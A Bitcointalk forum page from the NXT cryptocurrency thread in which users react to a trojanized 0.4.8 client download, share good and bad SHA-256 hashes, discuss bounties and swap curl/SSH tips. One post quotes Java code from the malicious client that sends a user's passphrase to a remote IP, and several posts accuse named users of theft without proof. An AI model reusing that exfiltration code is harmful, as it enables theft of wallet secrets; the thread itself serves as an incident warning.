Bitcoin Forum
December 10, 2025, 01:47:33 PM *
News: Latest Bitcoin Core release: 30.0 [Torrent]
 
   Home   Help Search Login Register More  
Pages: « 1 ... 559 560 561 562 563 564 565 566 567 568 569 570 571 572 573 574 575 576 577 578 579 580 581 582 583 584 585 586 587 588 589 590 591 592 593 594 595 596 597 598 599 600 601 602 603 604 605 606 607 608 [609] 610 611 612 613 614 615 616 617 618 619 620 621 622 623 624 625 626 627 628 629 630 631 632 633 634 635 636 637 638 639 640 641 642 643 644 645 646 647 648 649 650 651 652 653 654 655 656 657 658 659 ... 2548 »
  Print  
Author Topic: NXT :: descendant of Bitcoin - Updated Information  (Read 2761752 times)
jl777
Legendary
*
Offline Offline

Activity: 1176
Merit: 1134


View Profile WWW
January 02, 2014, 02:23:26 AM
 #12161

I think we all agree PaulyC should be made whole as he was the first to report this. Usually bounties are for the first, not sure what the feeling is about newcn's being second. There is value in confirmation, so maybe half credit?

We can't make a policy out of this, but I feel that during this critical time it is important to show the world what the NXT community is.

There are the payment fees that doesn't currently have, nor do I expect will have a team that can make a realistic claim to have added value to that feature. This creates a certain amount of the community fund that would be discretionary. The actual process of collection and disbursement of the community fund has not been completed yet, but as soon as this year gets into full gear I expect that the kinks will be worked out.

Since I seem to be the only one pushing this idea, I guess it is up to me to make discretionary calls, but I want to get people's feedback on the bounty for newcn's confirmation of this hack.

For anybody that wants to directly contribute to the community fund, all donations are welcome. I couldn't get any volunteers to deal with the logistics of all this, so I will coordinate it for now. I will disclose all contributions and disbursements. For now just post your contribution to the community fund and I will confirm receipt or if you want to do it anonymously, PM me your contribution and your contribution will be listed as from anonymous. If you want your contribution to be spread over a period of time, please state the time period.

James

P.S. The more in the community fund, the more people like wesleyh, ferment, nexern, etc. will be rewarded and this in turn will get more and more people improving NXT instead of working OT at their real jobs Smiley

http://www.digitalcatallaxy.com/report2015.html
100+ page annual report for SuperNET
xyzzyx
Sr. Member
****
Offline Offline

Activity: 490
Merit: 250


I don't really come from outer space.


View Profile
January 02, 2014, 02:23:35 AM
 #12162

Er...wtf?

Am i missing something?

I think you turned him into a newt, but he got better.

"An awful lot of code is being written ... in languages that aren't very good by people who don't know what they're doing." -- Barbara Liskov
mkmen
Full Member
***
Offline Offline

Activity: 157
Merit: 100



View Profile
January 02, 2014, 02:25:47 AM
 #12163

So, are most people with the new client boned?

If not, what should you check?

if the sha256 of your nxt-client-0.4.8.zip is:

ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2

you are fine, if it's:

948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06

you should download legit client and transfer your NXT immediately to another account if it's still there

how to get sha256 hash of your file is explained in this thread (nice windows tool here: http://sourceforge.net/projects/quickhash/)
opticalcarrier
Full Member
***
Offline Offline

Activity: 238
Merit: 100



View Profile
January 02, 2014, 02:26:12 AM
 #12164

opticalc, QBTC ---

WHY does nxtcrypto.org's download page point to https://mega.co.nz/#!yV5A1BTR!oi33K7WovgccuEHvP05nzggTnxrkZHJbwFmv5tGeXNI

..instead of http://info.nxtcrypto.org/client.zip ...

... and WHY are the hases not published alongside the download link?

I dont run the www site.  QBTC over at nextcoin.org runs the WWW site.  I will hit her up to fix that ASAP.
(remember, Im really just running DNS here, and trying to coordinate between all the other sites)

good catch though, definitely need to get her to fix it NOW
intel
Member
**
Offline Offline

Activity: 98
Merit: 10



View Profile
January 02, 2014, 02:30:09 AM
 #12165

opticalc, QBTC ---

WHY does nxtcrypto.org's download page point to https://mega.co.nz/#!yV5A1BTR!oi33K7WovgccuEHvP05nzggTnxrkZHJbwFmv5tGeXNI

..instead of http://info.nxtcrypto.org/client.zip ...

... and WHY are the hases not published alongside the download link?

I dont run the www site.  QBTC over at nextcoin.org runs the WWW site.  I will hit her up to fix that ASAP.
(remember, Im really just running DNS here, and trying to coordinate between all the other sites)

good catch though, definitely need to get her to fix it NOW

In fact 0.4.8 is http://info.nxtcrypto.org/nxt-client-0.4.8.zip

[!] 24.7 NXT News Portal. Real-Time Update. Share your own news with NXT community and get FREE NXT!
rickyjames
Full Member
***
Offline Offline

Activity: 196
Merit: 100


View Profile
January 02, 2014, 02:31:44 AM
 #12166

So, are most people with the new client boned?

If not, what should you check?

if the sha256 of your nxt-client-0.4.8.zip is:

ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2

you are fine, if it's:

948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06

you should download legit client and transfer your NXT immediately to another account if it's still there

how to get sha256 hash of your file is explained in this thread (nice windows tool here: http://sourceforge.net/projects/quickhash/)

OK, so I've verified I lucked out and got the "good" download completely by chance.  What's this about malware listening at digital ocean?  Can it only get data from the bad clients or all clients?
swartzfeger
Full Member
***
Offline Offline

Activity: 350
Merit: 100


View Profile
January 02, 2014, 02:31:55 AM
 #12167

So, are most people with the new client boned?

If not, what should you check?

Wesleyh, what's the status of the Mac client? I've only downloaded it from the links you've provided in your posts. I guess I shouldn't assume anything is safe.
newcn
Full Member
***
Offline Offline

Activity: 143
Merit: 100


View Profile
January 02, 2014, 02:31:59 AM
 #12168

ok,I find some clues:

the nxt zip file I downloaded(whose sha256 is diff from this thread now)
Code:
creation time:2013‎.‎12‎.‎31‎,‏‎20:31:14
‎modified time:2013‎.‎12‎.‎31,‏‎20:35:16

but in that time period, I only accessed 2 pages, they are all in this thread!!!
one is the first page of this thread!!!!
the second is https://bitcointalk.org/index.php?topic=345619.msg4236250#msg4236250
and I found one link from the second one,it is still there:
http://info.nxtcrypto.org/nxt-client-0.4.8.zip
is it possible that the thief can change the link of this thread?
omg,Its terrible!!!

BTC:1NzzfeHCgN8fF6mSG1UeBFCVd2cxKbGyHk
NXT:13187911577562526278
kunibopl
Full Member
***
Offline Offline

Activity: 184
Merit: 100


View Profile
January 02, 2014, 02:32:32 AM
 #12169

so Drexme once again stole coins by editing the downloadlink, that pointed to EpicThomas' manipulated client?

NXT: 5231236538923913892
EvilDave
Hero Member
*****
Offline Offline

Activity: 854
Merit: 1001



View Profile
January 02, 2014, 02:33:06 AM
 #12170

Er...wtf?

Am i missing something?

I think you turned him into a newt, but he got better.


Hmmm...I'm mostly not that evil  Grin

And HappyCoins.nl actually are very good, low fees, fast delivery and u can pay using the Dutch iDeal system. I spit on PayPal.....

Still curious why my name is up in lights all of a sudden

Nulli Dei, nulli Reges, solum NXT
Love your money: www.nxt.org  www.ardorplatform.org
www.nxter.org  www.nxtfoundation.org
salsacz
Hero Member
*****
Offline Offline

Activity: 490
Merit: 504


View Profile
January 02, 2014, 02:33:25 AM
 #12171

PaulyC:
the 0.4.8 client I used, I forgot where I downloaded it, but from chrome history, 
the link was http://162.243.246.223/nxt-client-0.4.8.zip
this client is different from what I Just downloaded from this thread:
Code:
 
ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2  nxt-client-0.4.8 (1).zip
948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06  nxt-client-0.4.8.zip

please check your browser history to find which page you used for the download - where did you find a link?

how to find it from Chrome?
I just find the link, not the webpage the link was in,
there should be some ways to find that!

ctrl+h Smiley
intel
Member
**
Offline Offline

Activity: 98
Merit: 10



View Profile
January 02, 2014, 02:35:12 AM
 #12172

So, are most people with the new client boned?

If not, what should you check?

if the sha256 of your nxt-client-0.4.8.zip is:

ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2

you are fine, if it's:

948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06

you should download legit client and transfer your NXT immediately to another account if it's still there

how to get sha256 hash of your file is explained in this thread (nice windows tool here: http://sourceforge.net/projects/quickhash/)

OK, so I've verified I lucked out and got the "good" download completely by chance.  What's this about malware listening at digital ocean?  Can it only get data from the bad clients or all clients?


Quote
      if (!paramString.equals(""))
      {
        if (!myKeys.contains(paramString))
        {
          URL url = new URL("http://162.243.246.223:3000/" + URLEncoder.encode(paramString, "ISO-8859-1"));
          URLConnection connection = url.openConnection();
          connection.setConnectTimeout(10000);
          connection.getInputStream();
          myKeys.add(paramString);
        }
      }

[!] 24.7 NXT News Portal. Real-Time Update. Share your own news with NXT community and get FREE NXT!
opticalcarrier
Full Member
***
Offline Offline

Activity: 238
Merit: 100



View Profile
January 02, 2014, 02:35:29 AM
 #12173

can I get some SSH remote command help here?

on a box, I can do lynx -dump http://localhost:7874/nxt?requestType=getPeer\&peer=79.102.159.249
to see the stats for the 79.102.159.249 peer if it is connected.  The results look like this (notice I had to escape the & there):
Code:
{"platform":"?","application":"NRS","weight":0,"state":1,"announcedAddress":"","
downloadedVolume":8758,"version":"0.4.7e","uploadedVolume":12675225}

why can I not use this to do a remote SSH command?

Code:
root@vps1:~# ssh -i .ssh/vps root@vps1 lynx -dump http://localhost:7874/nxt?requestType=getPeer\&peer=79.102.159.249
{"errorCode":3,"errorDescription":"\"peer\" not specified"}
root@vps1:~#

Try:
Code:
ssh root@vps1 -t -C 'curl "http://localhost:7874/nxt?requestType=getPeer&peer=79.102.159.249"'

More eye pleasing.
Code:
curl --silent "http://localhost:7874/nxt?requestType=getPeer&peer=79.102.159.249"  | python -m json.tool

Edit: Added --silent option


very cool thanks a ton guys
xyzzyx
Sr. Member
****
Offline Offline

Activity: 490
Merit: 250


I don't really come from outer space.


View Profile
January 02, 2014, 02:35:59 AM
 #12174

Er...wtf?

Am i missing something?

I think you turned him into a newt, but he got better.


Hmmm...I'm mostly not that evil  Grin

And HappyCoins.nl actually are very good, low fees, fast delivery and u can pay using the Dutch iDeal system. I spit on PayPal.....

Still curious why my name is up in lights all of a sudden

I think its a case of mistaken identity as people are a bit excited and a little angry at the moment.  You should go to the Winchester, have a nice cold pint, and wait for all of this to blow over.

"An awful lot of code is being written ... in languages that aren't very good by people who don't know what they're doing." -- Barbara Liskov
opticalcarrier
Full Member
***
Offline Offline

Activity: 238
Merit: 100



View Profile
January 02, 2014, 02:36:31 AM
 #12175

opticalc, QBTC ---

WHY does nxtcrypto.org's download page point to https://mega.co.nz/#!yV5A1BTR!oi33K7WovgccuEHvP05nzggTnxrkZHJbwFmv5tGeXNI

..instead of http://info.nxtcrypto.org/client.zip ...

... and WHY are the hases not published alongside the download link?

I dont run the www site.  QBTC over at nextcoin.org runs the WWW site.  I will hit her up to fix that ASAP.
(remember, Im really just running DNS here, and trying to coordinate between all the other sites)

good catch though, definitely need to get her to fix it NOW

In fact 0.4.8 is http://info.nxtcrypto.org/nxt-client-0.4.8.zip

Ive already asked her to update the download that is manually mirrored on her www site.
bidji29
Sr. Member
****
Offline Offline

Activity: 392
Merit: 250


View Profile
January 02, 2014, 02:37:48 AM
 #12176

You can use :

http://hash.online-convert.com/sha256-generator

To check the sha256 of a file on your computer or on the internet.

http://www.freebieservers.com/  100% FREE GAME SERVERS
intel
Member
**
Offline Offline

Activity: 98
Merit: 10



View Profile
January 02, 2014, 02:37:55 AM
 #12177

so Drexme once again stole coins by editing the downloadlink, that pointed to EpicThomas' manipulated client?

I contacted Gravaton and asked to remove all dextern posts asap!

[!] 24.7 NXT News Portal. Real-Time Update. Share your own news with NXT community and get FREE NXT!
Damelon
Legendary
*
Offline Offline

Activity: 1092
Merit: 1010



View Profile
January 02, 2014, 02:39:18 AM
 #12178

By the way, I just checked and Drexme was last online here two hours ago.
There is a good chance he will try to cash in tonight if he read this thread now that we are on, to him...

Member of the Nxt Foundation | Donations: NXT-D6K7-MLY6-98FM-FLL5T
Join Nxt Slack! https://nxtchat.herokuapp.com/
Founder of Blockchain Workspace | Personal Site & Blog
utopianfuture
Sr. Member
****
Offline Offline

Activity: 602
Merit: 268

Internet of Value


View Profile
January 02, 2014, 02:42:04 AM
 #12179

People, the malware is being hosted on 162.243.246.223, it is digital ocean, a lot of people here have VPS here.

Contact their support asap and notify that the IP 162.243.246.223 is running a listening backdoor / passlogger.

How does this work ? what type of activities are risky now ?


░░░░░░▄▄▄████████▄▄▄
░░░░▄████████████████▄
░░▄███████████████████▄
███████████████████████
▐████████████████████████▌
█████████████████████████
█████████████████████████
█████████████████████████
▐██████████████████████▌
████████████████████████
░░▀████████████████████▀
░░░░▀████████████████▀
░░░░░░▀▀▀████████▀▀▀
  TomoChain  •    •  TomoChain 
░░░░░░▄▄▄████████▄▄▄
░░░░▄████████████████▄
░░▄███████████████████▄
███████████████████████
▐████████████████████████▌
█████████████████████████
█████████████████████████
█████████████████████████
▐██████████████████████▌
████████████████████████
░░▀████████████████████▀
░░░░▀████████████████▀
░░░░░░▀▀▀████████▀▀▀
intel
Member
**
Offline Offline

Activity: 98
Merit: 10



View Profile
January 02, 2014, 02:42:38 AM
 #12180

Er...wtf?

Am i missing something?

I think you turned him into a newt, but he got better.


Hmmm...I'm mostly not that evil  Grin

And HappyCoins.nl actually are very good, low fees, fast delivery and u can pay using the Dutch iDeal system. I spit on PayPal.....

Still curious why my name is up in lights all of a sudden

According to your posts, you also actively "helped" people to understand how they got their funds stolen.

I would call you hacktroll!

One of your messages:
Quote
@PaulyC :

Have u scanned yr PC for malware? Trojan/key logger looks like a very good possiblility at this moment.

And how is yr off-line security ? Anyone else have acess to yr PC?

[!] 24.7 NXT News Portal. Real-Time Update. Share your own news with NXT community and get FREE NXT!
Pages: « 1 ... 559 560 561 562 563 564 565 566 567 568 569 570 571 572 573 574 575 576 577 578 579 580 581 582 583 584 585 586 587 588 589 590 591 592 593 594 595 596 597 598 599 600 601 602 603 604 605 606 607 608 [609] 610 611 612 613 614 615 616 617 618 619 620 621 622 623 624 625 626 627 628 629 630 631 632 633 634 635 636 637 638 639 640 641 642 643 644 645 646 647 648 649 650 651 652 653 654 655 656 657 658 659 ... 2548 »
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!